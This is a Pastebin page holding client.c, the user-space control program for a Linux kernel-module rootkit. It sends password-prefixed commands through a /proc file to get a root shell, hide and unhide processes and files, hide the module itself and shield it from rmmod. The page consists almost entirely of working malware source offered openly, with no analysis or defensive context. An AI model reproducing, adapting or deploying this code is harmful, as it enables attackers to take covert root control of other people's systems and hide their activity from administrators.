API tools faq
paste
Advertisement
FlyFar

client.c

FlyFar
Dec 24th, 2023
721
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.83 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  * Copyright (C) 2016-2017 Maxim Biro <nurupo.contributions@gmail.com>
  3.  *
  4.  * This program is free software; you can redistribute it and/or modify
  5.  * it under the terms of the GNU General Public License as published by
  6.  * the Free Software Foundation; either version 2 of the License, or
  7.  * (at your option) any later version.
  8.  *
  9.  * This program is distributed in the hope that it will be useful,
  10.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.  * GNU General Public License for more details.
  13.  *
  14.  * You should have received a copy of the GNU General Public License along
  15.  * with this program; if not, write to the Free Software Foundation, Inc.,
  16.  * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
  17.  */
  18.  
  19. #include <stdio.h>
  20. #include <stdlib.h>
  21. #include <string.h>
  22.  
  23. #include <fcntl.h>
  24. #include <getopt.h>
  25. #include <unistd.h>
  26.  
  27. #include "config.h"
  28.  
  29. void print_help(char **argv)
  30. {
  31.     printf(
  32.         "Usage: %s [OPTION]...\n"
  33.         "\n"
  34.         "Options:\n"
  35.         "  --root-shell            Grants you root shell access.\n"
  36.         "  --hide-pid=PID          Hides the specified PID.\n"
  37.         "  --unhide-pid=PID        Unhides the specified PID.\n"
  38.         "  --hide-file=FILENAME    Hides the specified FILENAME globally.\n"
  39.         "                          Must be a filename without any path.\n"
  40.         "  --unhide-file=FILENAME  Unhides the specified FILENAME.\n"
  41.         "  --hide                  Hides the rootkit LKM.\n"
  42.         "  --unhide                Unhides the rootkit LKM.\n"
  43.         "  --help                  Print this help message.\n"
  44.         "  --protect               Protects the rootkit from rmmod.\n"
  45.         "  --unprotect             Disables the rmmod protection.\n\n", argv[0]);
  46. }
  47.  
  48. void handle_command_line_arguments(int argc, char **argv, int *root, int *hide_pid,
  49.                                    int *unhide_pid, char **pid, int *hide_file,
  50.                                    int *unhide_file, char **file, int *hide,
  51.                                    int *unhide, int *protect, int *unprotect)
  52. {
  53.     if (argc < 2) {
  54.         fprintf(stderr, "Error: No arguments provided.\n\n");
  55.         print_help(argv);
  56.         exit(1);
  57.     }
  58.  
  59.     opterr = 0;
  60.  
  61.     static struct option long_options[] = {
  62.         {"root-shell",  no_argument,       0, 'a'},
  63.         {"hide-pid",    required_argument, 0, 'b'},
  64.         {"unhide-pid",  required_argument, 0, 'c'},
  65.         {"hide-file",   required_argument, 0, 'd'},
  66.         {"unhide-file", required_argument, 0, 'e'},
  67.         {"hide",        no_argument,       0, 'f'},
  68.         {"unhide",      no_argument,       0, 'g'},
  69.         {"help",        no_argument,       0, 'h'},
  70.         {"protect",     no_argument,       0, 'i'},
  71.         {"unprotect",   no_argument,       0, 'j'},
  72.         {0,             0,                 0,  0 }
  73.     };
  74.  
  75.     *root = 0;
  76.     *hide_pid = 0;
  77.     *unhide_pid = 0;
  78.     *pid = NULL;
  79.     *hide_file = 0;
  80.     *unhide_file = 0;
  81.     *file = NULL;
  82.     *hide = 0;
  83.     *unhide = 0;
  84.     *protect = 0;
  85.     *unprotect = 0;
  86.  
  87.     int opt;
  88.  
  89.     while ((opt = getopt_long(argc, argv, ":", long_options, NULL)) != -1) {
  90.  
  91.         switch (opt) {
  92.  
  93.             case 'a':
  94.                 *root = 1;
  95.                 break;
  96.  
  97.             case 'b':
  98.                 *hide_pid = 1;
  99.                 *pid = optarg;
  100.                 break;
  101.  
  102.             case 'c':
  103.                 *unhide_pid = 1;
  104.                 *pid = optarg;
  105.                 break;
  106.  
  107.             case 'd':
  108.                 *hide_file = 1;
  109.                 *file = optarg;
  110.                 break;
  111.  
  112.             case 'e':
  113.                 *unhide_file = 1;
  114.                 *file = optarg;
  115.                 break;
  116.  
  117.             case 'f':
  118.                 *hide = 1;
  119.                 break;
  120.  
  121.             case 'g':
  122.                 *unhide = 1;
  123.                 break;
  124.  
  125.             case 'h':
  126.                 print_help(argv);
  127.                 exit(0);
  128.  
  129.             case 'i':
  130.                 *protect = 1;
  131.                 break;
  132.  
  133.             case 'j':
  134.                 *unprotect = 1;
  135.                 break;
  136.  
  137.             case '?':
  138.                 fprintf(stderr, "Error: Unrecognized option %s\n\n", argv[optind - 1]);
  139.                 print_help(argv);
  140.                 exit(1);
  141.  
  142.             case ':':
  143.                 fprintf(stderr, "Error: No argument provided for option %s\n\n", argv[optind - 1]);
  144.                 print_help(argv);
  145.                 exit(1);
  146.         }
  147.     }
  148.  
  149.     if ((*root + *hide_pid + *unhide_pid + *hide_file + *unhide_file + *hide
  150.             + *unhide + *protect + *unprotect) != 1) {
  151.         fprintf(stderr, "Error: Exactly one option should be specified\n\n");
  152.         print_help(argv);
  153.         exit(1);
  154.     }
  155. }
  156.  
  157. void write_buffer(char **dest_ptr, char *src, size_t size)
  158. {
  159.     memcpy(*dest_ptr, src, size);
  160.     *dest_ptr += size;
  161. }
  162.  
  163. int main(int argc, char **argv)
  164. {
  165.     int root;
  166.     int hide_pid;
  167.     int unhide_pid;
  168.     char *pid;
  169.     int hide_file;
  170.     int unhide_file;
  171.     char *file;
  172.     int hide;
  173.     int unhide;
  174.     int protect;
  175.     int unprotect;
  176.  
  177.     handle_command_line_arguments(argc, argv, &root, &hide_pid, &unhide_pid, &pid,
  178.                                   &hide_file, &unhide_file, &file, &hide, &unhide,
  179.                                   &protect, &unprotect);
  180.  
  181.     size_t buf_size = 0;
  182.  
  183.     buf_size += sizeof(CFG_PASS);
  184.  
  185.     if (root) {
  186.         buf_size += sizeof(CFG_ROOT);
  187.     } else if (hide_pid) {
  188.         buf_size += sizeof(CFG_HIDE_PID) + strlen(pid);
  189.     } else if (unhide_pid) {
  190.         buf_size += sizeof(CFG_UNHIDE_PID) + strlen(pid);
  191.     } else if (hide_file) {
  192.         buf_size += sizeof(CFG_HIDE_FILE) + strlen(file);
  193.     } else if (unhide_file) {
  194.         buf_size += sizeof(CFG_UNHIDE_FILE) + strlen(file);
  195.     } else if (hide) {
  196.         buf_size += sizeof(CFG_HIDE);
  197.     } else if (unhide) {
  198.         buf_size += sizeof(CFG_UNHIDE);
  199.     } else if (protect) {
  200.         buf_size += sizeof(CFG_PROTECT);
  201.     } else if (unprotect) {
  202.         buf_size += sizeof(CFG_UNPROTECT);
  203.     }
  204.  
  205.     buf_size += 1; // for null terminator
  206.  
  207.     char *buf = malloc(buf_size);
  208.     buf[buf_size - 1] = 0;
  209.  
  210.     char *buf_ptr = buf;
  211.  
  212.     write_buffer(&buf_ptr, CFG_PASS, sizeof(CFG_PASS));
  213.  
  214.     if (root) {
  215.         write_buffer(&buf_ptr, CFG_ROOT, sizeof(CFG_ROOT));
  216.     } else if (hide_pid) {
  217.         write_buffer(&buf_ptr, CFG_HIDE_PID, sizeof(CFG_HIDE_PID));
  218.         write_buffer(&buf_ptr, pid, strlen(pid));
  219.     } else if (unhide_pid) {
  220.         write_buffer(&buf_ptr, CFG_UNHIDE_PID, sizeof(CFG_UNHIDE_PID));
  221.         write_buffer(&buf_ptr, pid, strlen(pid));
  222.     } else if (hide_file) {
  223.         write_buffer(&buf_ptr, CFG_HIDE_FILE, sizeof(CFG_HIDE_FILE));
  224.         write_buffer(&buf_ptr, file, strlen(file));
  225.     } else if (unhide_file) {
  226.         write_buffer(&buf_ptr, CFG_UNHIDE_FILE, sizeof(CFG_UNHIDE_FILE));
  227.         write_buffer(&buf_ptr, file, strlen(file));
  228.     } else if (hide) {
  229.         write_buffer(&buf_ptr, CFG_HIDE, sizeof(CFG_HIDE));
  230.     } else if (unhide) {
  231.         write_buffer(&buf_ptr, CFG_UNHIDE, sizeof(CFG_UNHIDE));
  232.     } else if (protect) {
  233.         write_buffer(&buf_ptr, CFG_PROTECT, sizeof(CFG_PROTECT));
  234.     } else if (unprotect) {
  235.         write_buffer(&buf_ptr, CFG_UNPROTECT, sizeof(CFG_UNPROTECT));
  236.     }
  237.  
  238.     int fd = open("/proc/" CFG_PROC_FILE, O_RDONLY);
  239.  
  240.     if (fd < 1) {
  241.         int fd = open("/proc/" CFG_PROC_FILE, O_WRONLY);
  242.  
  243.         if (fd < 1) {
  244.             fprintf(stderr, "Error: Failed to open %s\n", "/proc/" CFG_PROC_FILE);
  245.             return 1;
  246.         }
  247.  
  248.         write(fd, buf, buf_size);
  249.     } else {
  250.         read(fd, buf, buf_size);
  251.     }
  252.  
  253.     close(fd);
  254.     free(buf);
  255.  
  256.     if (root) {
  257.         execl("/bin/bash", "bash", NULL);
  258.     }
  259.  
  260.     return 0;
  261. }
Tags: ubuntu Linux Client rootkit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!